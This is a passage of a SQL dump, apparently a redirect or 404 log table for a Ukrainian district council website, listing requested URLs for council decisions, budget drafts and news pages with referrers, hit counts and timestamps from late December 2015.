00:00:00',301),(23428,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?catid=79&id=1257:pro-rajonnu-tsilovu-sotsialnu-programu-protidiji-vil-infektsiji-snidu-na-2015-2018-roki','','','',1,0,'2015-12-29 23:12:17','0000-00-00 00:00:00',301),(23429,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?catid=79&id=1259:pro-rajonnu-programu-vidpochinku-ta-ozdorovlennya-ditej-malinskogo-rajonu-na-2016-2020-roki','','','',1,0,'2015-12-29 23:12:19','0000-00-00 00:00:00',301),(23430,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?catid=79&id=1261:pro-rajonnu-programu-ozdorovlennya-teritoriji-malinskogo-rajonu-vid-skazu-na-2016-2020-roki','','','',1,0,'2015-12-29 23:12:21','0000-00-00 00:00:00',301),(23431,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?catid=79&id=1263:pro-rajonnu-programu-sotsialnoji-pidtrimki-ditej-simej-ta-molodi-na-2016-2020-roki','','','',1,0,'2015-12-29 23:12:23','0000-00-00 00:00:00',301),(23432,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?catid=79&id=1266:pro-rajonnu-tsilovu-programu-roboti-iz-obdarovanoyu-moloddyu-na-2016-2018-roki','','','',1,0,'2015-12-29 23:12:25','0000-00-00 00:00:00',301),(23433,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?catid=79&id=1267:pro-programu-zabezpechennya-deputatskoji-diyalnosti-na-2016-rik','','','',1,0,'2015-12-29 23:12:27','0000-00-00 00:00:00',301),(23434,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?catid=79&id=1268:pro-deleguvannya-povnovazhen-malinskoji-rajonnoji-radi-malinskij-rajonnij-derzhavnij-administratsiji','','','',1,0,'2015-12-29 23:12:32','0000-00-00 00:00:00',301),(23435,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?catid=79&id=1269:pro-znyattya-z-kontrolyu-rishen-rajonnoji-radi','','','',1,0,'2015-12-29 23:12:33','0000-00-00 00:00:00',301),(23436,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?catid=79&id=1271:pro-zatverdzhennya-strukturi-ta-chiselnosti-vikonavchogo-aparatu-radi-vitrat-na-jogo-utrimannya','','','',1,0,'2015-12-29 23:12:37','0000-00-00 00:00:00',301),(23437,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?catid=79&id=1274:pro-likvidatsiyu-lyubovitskoji-ta-shevchenkivskoji-zagalnoosvitnikh-shkil-i-ii-stupeniv','','','',1,0,'2015-12-29 23:12:39','0000-00-00 00:00:00',301),(23438,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?catid=79&id=1275:pro-pogodzhennya-zvilnennya-z-posadi-direktora-rajonnogo-budinku-kulturi-vishnevskoji-o-v','','','',1,0,'2015-12-29 23:12:43','0000-00-00 00:00:00',301),(23439,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?catid=79&id=1277:pro-ugodu-mizh-zhitomirskoyu-oblasnoyu-radoyu-ta-malinskoyu-rajonnoyu-radoyu','','','',1,0,'2015-12-29 23:12:45','0000-00-00 00:00:00',301),(23440,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?catid=79&id=1278:pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-pro-normativnu-groshovu-otsinku-zemelnoji-dilyanki-yaka-peredaetsya-v-orendu-gr-beginu-v-m','','','',1,0,'2015-12-29 23:12:47','0000-00-00 00:00:00',301),(23441,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?catid=79&id=1282:pro-viznachennya-umov-oplati-pratsi-golovi-rajonnoji-radi-ta-zastupnika-golovi-rajonnoji-radi-na-2016-rik','','','',1,0,'2015-12-29 23:12:49','0000-00-00 00:00:00',301),(23442,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?catid=79&id=1284:pro-pilgovij-projizd-uchniv-ta-pedagogichnikh-pratsivnikiv-zakladiv-osviti-malinskogo-rajonu-na-2016-rik','','','',1,0,'2015-12-29 23:12:51','0000-00-00 00:00:00',301),(23443,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?catid=79&id=1287:pro-vstanovlennya-rozmiru-vartosti-kharchuvannya-ta-batkivskoji-plati-u-doshkilnikh-navchalnikh-zakladakh-na-2016-rik','','','',1,0,'2015-12-29 23:12:54','0000-00-00 00:00:00',301),(23444,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?catid=79&id=1289:pro-perelik-investitsijnikh-proektiv-shcho-mozhut-realizovuvatis-za-rakhunok-koshtiv-derzhavnogo-fondu-regionalnogo-rozvitku','','','',1,0,'2015-12-29 23:12:58','0000-00-00 00:00:00',301),(23445,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=771:-2012-2015-&Itemid=84&lang=en&option=com_content&view=article','','','',1,0,'2015-12-29 23:42:25','0000-00-00 00:00:00',301),(23446,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=828:-q-q&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-29 23:43:26','0000-00-00 00:00:00',301),(23447,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1094:2013-09-24-05-02-52&lang=en&option=com_content&view=article','','','',1,0,'2015-12-30 00:03:20','0000-00-00 00:00:00',301),(23448,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1254:-1-50&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-30 00:30:19','0000-00-00 00:00:00',301),(23449,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=688:2012-05-25-16-34-51&Itemid=0&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-30 00:40:55','0000-00-00 00:00:00',301),(23450,'http://www.malyn-rayrada.org.ua/index.php?catid=57&id=1274:-l-r&Itemid=98&lang=en&option=com_content&view=article','','','',1,0,'2015-12-30 00:41:17','0000-00-00 00:00:00',301),(23451,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/831-pro-obrannja-zastupnika-golovi-rajonnoi-radi_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-30 00:54:41','0000-00-00 00:00:00',301),(23452,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/833-pro-pidtrimku-vijskovosluzhbovciv-zhiteliv','','','',7,0,'2015-12-30 00:54:41','0000-00-00 00:00:00',301),(23454,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/malinshchina-ta-malinchani?page=2','','','',13,0,'2015-12-30 00:57:15','0000-00-00 00:00:00',301),(23455,'http://malyn-rayrada.org.ua/index.php/309-vitaemo-z-dnem-peremogi_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-30 00:57:25','0000-00-00 00:00:00',301),(23456,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1296-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2015-rik?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-12-30 01:00:29','0000-00-00 00:00:00',301),(23457,'http://malyn-rayrada.org.ua/index.php/477-priznachennja-tizhnja_2','','','',7,0,'2015-12-30 01:00:31','0000-00-00 00:00:00',301),(23458,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1283-pro-rajonnij-byudzhet-na-2016-rik','','','',5,0,'2015-12-30 01:03:47','0000-00-00 00:00:00',301),(23460,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1291-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-iz-zemleustroyu-shchodo-vnesennya-zmin-v-proekt-formuvannya-teritoriji-i-stanovlennya-mezh-lyubovitskoji-silskoji-radi-malinskogo-rajon','','','',1,0,'2015-12-30 01:03:48','0000-00-00 00:00:00',301),(23462,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=747:2012-08-03-09-21-28&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-30 01:21:46','0000-00-00 00:00:00',301),(23463,'http://www.malyn-rayrada.org.ua/index.php?catid=40:--28032012-&id=591:2012-02-27-14-31-33&Itemid=77&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-30 01:21:47','0000-00-00 00:00:00',301),(23464,'http://www.malyn-rayrada.org.ua/index.php?catid=40:--28032012-&id=581:2012-02-27-13-13-19&Itemid=77&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-30 01:21:48','0000-00-00 00:00:00',301),(23465,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1121:-24-6-&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-30 01:21:50','0000-00-00 00:00:00',301),(23466,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=30&layout=blog&Itemid=61&lang=en','','','',1,0,'2015-12-30 01:27:12','0000-00-00 00:00:00',301),(23467,'http://www.malyn-rayrada.org.ua/index.php/843-vistup-prezidenta-na-paradi-na-chest-23-i-richnici?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-30 02:00:21','0000-00-00 00:00:00',301),(23468,'http://www.malyn-rayrada.org.ua/index.php/775-pro-sklikannja-30-sesii-rajonnoi-radi-6-sklikannja?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-30 03:21:22','0000-00-00 00:00:00',301),(23469,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/1202-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2015-rik?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-30 03:30:35','0000-00-00 00:00:00',301),(23470,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/1205-pro-zvernennya-do-kerivnitstva-dp-propan-shchodo-zabezpechennya-zhiteliv-rajonu-skraplenim-gazom?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-12-30 03:30:37','0000-00-00 00:00:00',301),(23471,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/995-pro-vstanovlennya-rozmiru-vartosti-kharchuvannya-ta-batkivskoji-plati-u-doshkilnikh-navchalnikh-zakladakh?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-30 03:30:52','0000-00-00 00:00:00',301),(23472,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-25-02-2015-roku/1021-pro-zatverdzhennya-programi-sotsialnoji-pidtrimki-vnutrishno-peremishchenikh-osib?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-12-30 03:30:56','0000-00-00 00:00:00',301),(23473,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-25-02-2015-roku/1022-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2015-rik?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-12-30 03:30:57','0000-00-00 00:00:00',301),(23474,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/929-pro-znyattya-z-kontrolyu-rishen-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-12-30 03:31:04','0000-00-00 00:00:00',301),(23475,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/940-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2014-rik?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-12-30 03:31:09','0000-00-00 00:00:00',301),(23476,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/76-rishennya-vid-29-07-2015-roku/1169-pro-neobkhidnist-vzyattya-na-oblik-bezkhazyajnogo-nerukhomogo-majna?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-12-30 03:31:14','0000-00-00 00:00:00',301),(23477,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=275:---------------2011-&catid=31:-25032011&Itemid=62&lang=en','','','',7,0,'2015-12-30 03:45:48','0000-00-00 00:00:00',301),(23478,'http://www.malyn-rayrada.org.ua/index.php/3-vitannja-iz-svitlim-hristovim-voskresinnjam?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-30 11:27:00','0000-00-00 00:00:00',301),(23479,'http://www.malyn-rayrada.org.ua/index.php/251-vitaemo-iz-svjatom?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-30 12:04:47','0000-00-00 00:00:00',301),(23480,'http://www.malyn-rayrada.org.ua/index.php/582-jak-vberegtisja-vid-speki-poradi-mns?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-30 13:03:03','0000-00-00 00:00:00',301),(23483,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-05-12-54-02?id=59','','','',3,0,'2015-12-30 13:33:07','0000-00-00 00:00:00',301),(23484,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-03-57-58/60-deputatska-storinka/2010-06-05-12-52-17?lang=en','','','',16,0,'2015-12-30 13:33:09','0000-00-00 00:00:00',301),(23485,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-03-57-58/60-deputatska-storinka/2010-06-05-12-52-17?lang=ru','','','',4,0,'2015-12-30 13:33:16','0000-00-00 00:00:00',301),(23486,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?catid=0&id=76','','','',22,0,'2015-12-30 14:08:20','0000-00-00 00:00:00',301),(23487,'http://www.malyn-rayrada.org.ua/index.php/1073-15-kvitnya-blagodijnij-kontsert-v-rbk?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-30 14:34:33','0000-00-00 00:00:00',301),(23488,'http://malyn-rayrada.org.ua/index.php?catid=1297&id=1297:urochistosti-z-nagodi-25-richchya-pfu','','','',4,0,'2015-12-30 15:00:14','0000-00-00 00:00:00',301),(23489,'http://malyn-rayrada.org.ua/index.php?catid=1303&id=1303:pro-rozglyad-klopotan-shchodo-pripinennya-prava-koristuvannya-mislivskimi-ugiddyami-tov-svit-progresivnikh-tekhnologij','','','',4,0,'2015-12-30 15:00:17','0000-00-00 00:00:00',301),(23490,'http://malyn-rayrada.org.ua/index.php?catid=729&id=729:vitaemo-usih-zhinok-iz-svjatom-vesni','','','',3,0,'2015-12-30 15:00:23','0000-00-00 00:00:00',301),(23491,'http://malyn-rayrada.org.ua/index.php?tmpl=component&print=1&layout=default&page=&catid=1297&id=1297:urochistosti-z-nagodi-25-richchya-pfu','','','',4,0,'2015-12-30 15:00:28','0000-00-00 00:00:00',301),(23492,'http://malyn-rayrada.org.ua/index.php?tmpl=component&print=1&layout=default&page=&catid=1303&id=1303:pro-rozglyad-klopotan-shchodo-pripinennya-prava-koristuvannya-mislivskimi-ugiddyami-tov-svit-progresivnikh-tekhnologij','','','',4,0,'2015-12-30 15:00:31','0000-00-00 00:00:00',301),(23493,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=315:2011-05-20-13-07-47&catid=33&Itemid=66&lang=en','','','',1,0,'2015-12-30 15:39:16','0000-00-00 00:00:00',301),(23494,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=835:2012-12-02-07-47-14&catid=11&Itemid=14&lang=uk','','','',1,0,'2015-12-30 18:32:43','0000-00-00 00:00:00',301),(23495,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27/pochesni-gromadyani-rajonu-3-13','','','',4,0,'2015-12-30 20:31:42','0000-00-00 00:00:00',301),(23496,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/malinshchina-i-malinchani-76','','','',4,0,'2015-12-30 20:31:44','0000-00-00 00:00:00',301),(23497,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/malinshchina-i-malinchani-82','','','',5,0,'2015-12-30 20:31:46','0000-00-00 00:00:00',301),(23498,'http://www.malyn-rayrada.org.ua/index.php/967-vidbulas-36-sesiya-rajonnoji-radi?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-30 21:20:39','0000-00-00 00:00:00',301),(23499,'http://www.malyn-rayrada.org.ua/index.php/987-viplata-pensij-osobam-yaki-peremishchuyutsya-z-timchasovo-okupovanoji-teritoriji-ukrajini-abo-rajoniv-provedennya-ato?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-30 22:28:47','0000-00-00 00:00:00',301),(23500,'http://malyn-rayrada.org.ua/index.php/1286-kp-akhplan-malinskoji-rajonnoji-radi-ogoloshue-pro-namir-peredati-nerukhome-majno-v-orendu','','','',9,0,'2015-12-30 22:29:09','0000-00-00 00:00:00',301),(23501,'http://www.malyn-rayrada.org.ua/index.php/1286-kp-akhplan-malinskoji-rajonnoji-radi-ogoloshue-pro-namir-peredati-nerukhome-majno-v-orendu','','','',24,0,'2015-12-31 00:01:44','0000-00-00 00:00:00',301),(23502,'http://www.malyn-rayrada.org.ua/index.php/71-novo-vorob’ivskij-znvkshkola-sad-i-iii-stupeniv?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',2,0,'2015-12-31 00:07:47','0000-00-00 00:00:00',301),(23503,'http://malyn-rayrada.org.ua/cache/cache-db.php','','','',1,0,'2015-12-31 01:01:27','0000-00-00 00:00:00',301),(23504,'http://www.malyn-rayrada.org.ua/index.php/40-vitaemo-zi-svjatom-hristovogo-voskresinnja?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',2,0,'2015-12-31 01:59:10','0000-00-00 00:00:00',301),(23505,'http://www.malyn-rayrada.org.ua/index.php/1211-vitaemo-z-dnem-vchitelya?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',2,0,'2015-12-31 02:55:39','0000-00-00 00:00:00',301),(23506,'http://www.malyn-rayrada.org.ua/index.php/558-27-sesija-rajonnoi-radi-vidbudetsja-4-ljutogo-2014?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',2,0,'2015-12-31 04:25:24','0000-00-00 00:00:00',301),(23507,'http://malyn-rayrada.org.ua/libraries/simplepie/simplepie.lib.php','','','',1,0,'2015-12-31 05:31:01','0000-00-00 00:00:00',301),(23508,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1261-pro-rajonnu-programu-ozdorovlennya-teritoriji-malinskogo-rajonu-vid-skazu-na-2016-2020-roki?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-12-31 06:07:27','0000-00-00 00:00:00',301),(23509,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1263-pro-rajonnu-programu-sotsialnoji-pidtrimki-ditej-simej-ta-molodi-na-2016-2020-roki?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-12-31 06:07:30','0000-00-00 00:00:00',301),(23510,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1266-pro-rajonnu-tsilovu-programu-roboti-iz-obdarovanoyu-moloddyu-na-2016-2018-roki?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-31 06:07:33','0000-00-00 00:00:00',301),(23511,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1267-pro-programu-zabezpechennya-deputatskoji-diyalnosti-na-2016-rik?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-31 06:07:35','0000-00-00 00:00:00',301),(23512,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1268-pro-deleguvannya-povnovazhen-malinskoji-rajonnoji-radi-malinskij-rajonnij-derzhavnij-administratsiji?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-31 06:07:38','0000-00-00 00:00:00',301),(23513,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1269-pro-znyattya-z-kontrolyu-rishen-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-31 06:07:41','0000-00-00 00:00:00',301),(23514,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1270-pro-zatverdzhennya-planu-diyalnosti-rajonnoji-radi-z-pidgotovki-proektiv-regulyatornikh-aktiv-na-2016-rik?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-31 06:07:43','0000-00-00 00:00:00',301),(23515,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1271-pro-zatverdzhennya-strukturi-ta-chiselnosti-vikonavchogo-aparatu-radi-vitrat-na-jogo-utrimannya?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-31 06:07:45','0000-00-00 00:00:00',301),(23516,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1274-pro-likvidatsiyu-lyubovitskoji-ta-shevchenkivskoji-zagalnoosvitnikh-shkil-i-ii-stupeniv?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-12-31 06:07:48','0000-00-00 00:00:00',301),(23517,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1275-pro-pogodzhennya-zvilnennya-z-posadi-direktora-rajonnogo-budinku-kulturi-vishnevskoji-o-v?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-12-31 06:07:52','0000-00-00 00:00:00',301),(23518,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1277-pro-ugodu-mizh-zhitomirskoyu-oblasnoyu-radoyu-ta-malinskoyu-rajonnoyu-radoyu?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-31 06:07:59','0000-00-00 00:00:00',301),(23519,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29&id=201:--------l-r--2011--&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-31 07:32:23','0000-00-00 00:00:00',301),(23520,'http://www.malyn-rayrada.org.ua/index.php?catid=1303&id=1303:pro-rozglyad-klopotan-shchodo-pripinennya-prava-koristuvannya-mislivskimi-ugiddyami-tov-svit-progresivnikh-tekhnologij','','','',33,0,'2015-12-31 08:24:30','0000-00-00 00:00:00',301),(23521,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=583:-l-lr&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2015-12-31 11:31:16','0000-00-00 00:00:00',301),(23522,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1256-pro-kompleksnu-programu-pidtrimki-diyalnosti-komunalnoji-ustanovi-malinskij-rajonnij-trudovij-arkhiv-malinskoji-rajonnoji-radi-na-2016-2021roki','','','',21,0,'2015-12-31 11:43:12','0000-00-00 00:00:00',301),(23523,'http://malyn-rayrada.org.ua/index.php/1220-ogoloshennya-pro-provedennya-konkursu-na-pravo-orendi-majna-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-malinskogo-rajonu?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',2,0,'2015-12-31 13:35:34','0000-00-00 00:00:00',301),(23524,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=629:2012-04-03-10-52-55&catid=11&Itemid=14&lang=uk','','','',2,0,'2015-12-31 13:50:04','0000-00-00 00:00:00',301),(23525,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=833:2012-11-30-06-51-18&Itemid=14&lang=en','','','',1,0,'2015-12-31 15:08:57','0000-00-00 00:00:00',301),(23526,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=47&Itemid=86&lang=en&limitstart=20','','','',1,0,'2015-12-31 15:08:57','0000-00-00 00:00:00',301),(23527,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=832:-9-2012-&lang=en','','','',1,0,'2015-12-31 15:08:58','0000-00-00 00:00:00',301),(23528,'http://www.malyn-rayrada.org.ua/index.php/1126-viddil-statistiki-u-malinskomu-rajoni-informue-pro-cotsialno-ekonomichne-stanovishche-malinskogo-rajonu-za-sichen-traven-2015-roku?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-31 15:08:59','0000-00-00 00:00:00',301),(23530,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=773:2012-10-02-06-48-57&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',6,0,'2015-12-31 15:09:00','0000-00-00 00:00:00',301),(23532,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=649:-2011-2015-&catid=42:--16052012-&Itemid=80&lang=uk','','','',3,0,'2015-12-31 15:09:03','0000-00-00 00:00:00',301),(23533,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=509:2011-12-20-08-03-11&catid=38&Itemid=73&lang=ru','','','',1,0,'2015-12-31 15:09:05','0000-00-00 00:00:00',301),(23534,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=342:----6----6--15--2011-&catid=34&Itemid=68&lang=ru','','','',1,0,'2015-12-31 15:09:27','0000-00-00 00:00:00',301),(23535,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=333:-2011-&Itemid=66&lang=ru','','','',1,0,'2015-12-31 15:09:27','0000-00-00 00:00:00',301),(23536,'http://www.malyn-rayrada.org.ua/index.php/1132-zastupnik-keruyuchogo-nachalnik-viddilu-rozvitku-bankivskogo-biznesu-tvbv-10005-038-filiji-zhitomirskogo-oblasnogo-upravlinnya-at-oshchadbank-mikhajlenko-s-m-informue?tmpl=component&print=1&layout=default&pag','','','',1,0,'2015-12-31 15:09:29','0000-00-00 00:00:00',301),(23537,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-18-09-2015-roku/1193-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-31 15:09:38','0000-00-00 00:00:00',301),(23538,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/235-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2012_3?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-12-31 15:09:57','0000-00-00 00:00:00',301),(23539,'http://www.malyn-rayrada.org.ua/index.php/1136-pishov-z-zhittya-mikola-demskij?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-31 15:10:02','0000-00-00 00:00:00',301),(23540,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/871-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-po-viznachennyu-normativnoji-groshovoji-otsinki-zemelnoji-dilyanki-yaka-nadaetsya-v-orendu-ripenku-m-v?tmpl=comp','','','',1,0,'2015-12-31 15:10:28','0000-00-00 00:00:00',301),(23541,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1256-pro-kompleksnu-programu-pidtrimki-diyalnosti-komunalnoji-ustanovi-malinskij-rajonnij-trudovij-arkhiv-malinskoji-rajonnoji-radi-na-2016-2021roki?tmpl=component&print=1&layout=defa','','','',1,0,'2015-12-31 15:10:37','0000-00-00 00:00:00',301),(23542,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=864:-qq&lang=uk','','','',1,0,'2015-12-31 15:10:59','0000-00-00 00:00:00',301),(23543,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1284-pro-pilgovij-projizd-uchniv-ta-pedagogichnikh-pratsivnikiv-zakladiv-osviti-malinskogo-rajonu-na-2016-rik?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-31 15:11:03','0000-00-00 00:00:00',301),(23544,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=802:-i-i-i-i-i&Itemid=14&lang=en','','','',1,0,'2015-12-31 15:11:04','0000-00-00 00:00:00',301),(23545,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=747:2012-08-03-09-21-28&catid=11&lang=ru','','','',1,0,'2015-12-31 15:11:09','0000-00-00 00:00:00',301),(23546,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=746:-2012-&Itemid=82&lang=uk','','','',1,0,'2015-12-31 15:11:09','0000-00-00 00:00:00',301),(23547,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=682:-2012-&Itemid=80&lang=en','','','',2,0,'2015-12-31 15:11:24','0000-00-00 00:00:00',301),(23548,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=49&Itemid=88&lang=en&limitstart=15','','','',1,0,'2015-12-31 15:11:25','0000-00-00 00:00:00',301),(23549,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=439:2011-10-21-16-22-19&catid=37&Itemid=72&lang=uk','','','',3,0,'2015-12-31 15:11:26','0000-00-00 00:00:00',301),(23550,'http://www.malyn-rayrada.org.ua/index.php/1286-kp-akhplan-malinskoji-rajonnoji-radi-ogoloshue-pro-namir-peredati-nerukhome-majno-v-orendu?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-12-31 15:11:28','0000-00-00 